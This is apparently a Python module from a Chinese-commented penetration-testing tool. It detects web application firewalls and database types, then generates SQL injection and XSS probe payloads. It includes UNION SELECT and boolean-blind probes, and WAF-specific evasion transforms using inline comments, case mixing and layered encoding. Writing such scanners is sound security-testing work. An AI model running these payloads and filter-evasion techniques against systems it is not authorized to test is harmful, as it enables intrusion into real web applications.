"""PenScope —— 智能载荷生成模块
核心思想：根据目标环境动态调整攻击向量。
 1) WAF 探测：发送探测请求，识别是否有防护设备（决定是否启用规避载荷）
 2) 数据库指纹：从报错信息识别后端数据库类型（决定注入语法）
 3) 编码绕过：依据放行情况切换 URL / 双重 / Unicode 编码
所有载荷仅用于漏洞"检测/验证"，不携带破坏性指令。
"""
import re
import random
import requests

# 常见 WAF 指纹（响应头 / 状态码 / 特征串）
WAF_SIGNATURES = {
    "Cloudflare": ["cloudflare", "__cfduid", "cf-ray"],
    "AWS WAF": ["x-amzn-requestid", "aws-waf"],
    "ModSecurity": ["mod_security", "this error was generated by mod_security", "not acceptable"],
    "Wordfence": ["wordfence"],
    "Sucuri": ["sucuri", "x-sucuri-id"],
    "360": ["ngx_waf", "360"],
    "Akamai": ["akamaighost", "akamai"],
    "Barracuda": ["barra_counter_session", "barracuda"],
    "F5 BIG-IP": ["bigipserver", "ts01", "x-waf-event"],
    "未知WAF": ["access denied", "forbidden by", "blocked by", "security policy"],
}


# ---------------- C-03：按 WAF 类型分派的绕过变换 ----------------
def _t_case(p):
    """随机大小写混淆（针对字母字符），绕过大小写敏感的规则。"""
    out = []
    for ch in p:
        if ch.isalpha() and random.random() < 0.5:
            out.append(ch.upper() if ch.islower() else ch.lower())
        else:
            out.append(ch)
    return "".join(out)


def _t_inline_comment(p):
    """在 SQL 关键字内部插入内联注释（如 OR -> O/**/R），绕过关键字正则。"""
    return re.sub(
        r"(?i)(AND|OR|SELECT|UNION|FROM|WHERE|ORDER|BY|CHAR|SUBSTRING|SLEEP|BENCHMARK|CAST|CONCAT)",
        lambda m: m.group(1)[0] + "/**/" + m.group(1)[1:], p)


def _t_space_to_comment(p):
    """空格替换为内联注释（绕过空格黑名单）。"""
    return p.replace(" ", "/**/")


def _t_tab(p):
    """空格替换为制表符（绕过空白字符过滤）。"""
    return p.replace(" ", "\t")


def _t_url(p):
    return requests.utils.quote(p)


def _t_double_url(p):
    return requests.utils.quote(requests.utils.quote(p))


def _t_unicode(p):
    return p.encode("unicode_escape").decode("ascii")


# 各 WAF 的专属绕过变换序列；越靠前越"轻量"，避免对目标造成过大扰动。
WAF_EVASION = {
    "Cloudflare": [_t_inline_comment, _t_space_to_comment, _t_case],
    "AWS WAF": [_t_inline_comment, _t_space_to_comment, _t_case],
    "ModSecurity": [_t_inline_comment, _t_tab, _t_space_to_comment, _t_url],
    "Wordfence": [_t_space_to_comment, _t_case],
    "Sucuri": [_t_inline_comment, _t_case],
    "360": [_t_inline_comment, _t_space_to_comment, _t_case],
    "Akamai": [_t_inline_comment, _t_case],
    "Barracuda": [_t_space_to_comment, _t_case],
    "F5 BIG-IP": [_t_inline_comment, _t_case],
}


def _evade_for(waf, payloads):
    """按 WAF 类型生成规避变体集合（C-03 核心）。

    - 无 WAF：原样返回（不增加噪音）。
    - 已知 WAF 有专属策略：应用该策略的变换序列。
    - 已知 WAF 但无专属策略 / 疑似 WAF（状态码拦截）：使用通用规避集。
    所有变体去重，保留原始 payload 作为基线。
    """
    if not waf:
        return list(payloads)
    transforms = WAF_EVASION.get(waf)
    if transforms is None:
        transforms = [lambda p: p, _t_case, _t_space_to_comment, _t_url, _t_double_url]
    out = []
    for p in payloads:
        out.append(p)
        for tr in transforms:
            try:
                v = tr(p)
                if v and v != p:
                    out.append(v)
            except Exception:
                pass
    seen, uniq = set(), []
    for v in out:
        if v not in seen:
            seen.add(v)
            uniq.append(v)
    return uniq

# 数据库报错指纹
DB_SIGNATURES = {
    "MySQL": ["you have an error in your sql syntax", "mysql_fetch", "mariadb"],
    "PostgreSQL": ["pg_query", "postgresql", "psql", "pg_"],
    "MSSQL": ["microsoft sql server", "odbc sql server driver", "unclosed quotation mark"],
    "Oracle": ["ora-", "oracle", "quoted string not properly ended"],
    "SQLite": ["sqlite_error", "near \"{", "sqlite3", "unrecognized token"],
}

# 基础 SQL 注入探针（错误型）
SQLI_ERROR_BASE = ["'", "\"", "')", "';"]
# 布尔盲注对比对
SQLI_BOOL_TRUE = ["' AND '1'='1", "\" AND \"1\"=\"1", "') AND ('1'='1"]
SQLI_BOOL_FALSE = ["' AND '1'='2", "\" AND \"1\"=\"2", "') AND ('1'='2"]

# 反射型 XSS 标记（唯一串，便于回显检测）
XSS_MARKERS = [
    "<script>alert(1)</script>",
    "\"><svg/onload=alert(1)>",
    "<img src=x onerror=alert(1)>",
    "{{1*1}}",  # 模板注入探测（顺带检测 SSTI）
]

# 敏感文件/路径（端口扫描后版本比对用，见 vuln_db）


def detect_waf(session, url, timeout=5.0, proxies=None, verify_ssl=True):
    """发送探测载荷，识别目标是否前置 WAF。返回 WAF 名称或 None。

    verify_ssl 默认开启（AP-002）：遵循按目标的 TLS 校验策略，仅在目标勾选自签证书时关闭。
    """
    probe = url + ("&" if "?" in url else "?") + "a=<script>alert(1)</script>' OR 1=1--"
    try:
        r = session.get(probe, timeout=timeout, proxies=proxies, verify=verify_ssl, allow_redirects=False)
    except requests.RequestException:
        return None
    blob = (str(r.status_code) + " " + str(r.headers).lower() + " " + r.text.lower())
    for name, sigs in WAF_SIGNATURES.items():
        for s in sigs:
            if s in blob:
                return name
    # 若返回 403/419/999 且正常页面本应是 200，疑似被拦
    if r.status_code in (403, 419, 999):
        return "疑似WAF(状态码拦截)"
    return None


def detect_db_from_error(text):
    """从报错文本识别后端数据库类型。"""
    t = (text or "").lower()
    for db, sigs in DB_SIGNATURES.items():
        for s in sigs:
            if s in t:
                return db
    return None


def encode_payload(payload, method):
    """对载荷做编码转换，用于绕过简单过滤。"""
    if method == "url":
        return requests.utils.quote(payload)
    if method == "double_url":
        return requests.utils.quote(requests.utils.quote(payload))
    if method == "unicode":
        return payload.encode("unicode_escape").decode("ascii")
    return payload


class PayloadGenerator:
    """按目标环境生成自适应载荷集合。"""

    def __init__(self, waf=None, db=None):
        self.waf = waf
        self.db = db

    def sqli_payloads(self):
        """根据 DB 类型与 WAF 生成注入载荷。"""
        payloads = list(SQLI_ERROR_BASE)
        # 错误型：按数据库选择注释符与提取载荷
        if self.db == "MySQL":
            payloads += ["' OR 1=1-- -", "' UNION SELECT 1,version()-- -"]
        elif self.db == "PostgreSQL":
            payloads += ["' OR 1=1--", "' UNION SELECT version()--"]
        elif self.db == "MSSQL":
            payloads += ["' OR 1=1--", "'; SELECT @@version--"]
        elif self.db == "Oracle":
            payloads += ["' OR 1=1 FROM dual--", "' UNION SELECT banner FROM v$version--"]
        else:
            payloads += ["' OR 1=1--", "' OR '1'='1", "\" OR \"1\"=\"1"]
        # 布尔盲注对比对
        payloads += SQLI_BOOL_TRUE + SQLI_BOOL_FALSE
        return self._evade(payloads)

    def xss_payloads(self):
        payloads = list(XSS_MARKERS)
        return self._evade(payloads)

    def _evade(self, payloads):
        """若存在 WAF，按 WAF 类型追加规避变体（C-03 分派）。"""
        return _evade_for(self.waf, payloads)

    def report(self):
        return {
            "waf": self.waf or "未检测到",
            "db": self.db or "未知",
            "evasion": "已启用" if self.waf else "未启用",
        }
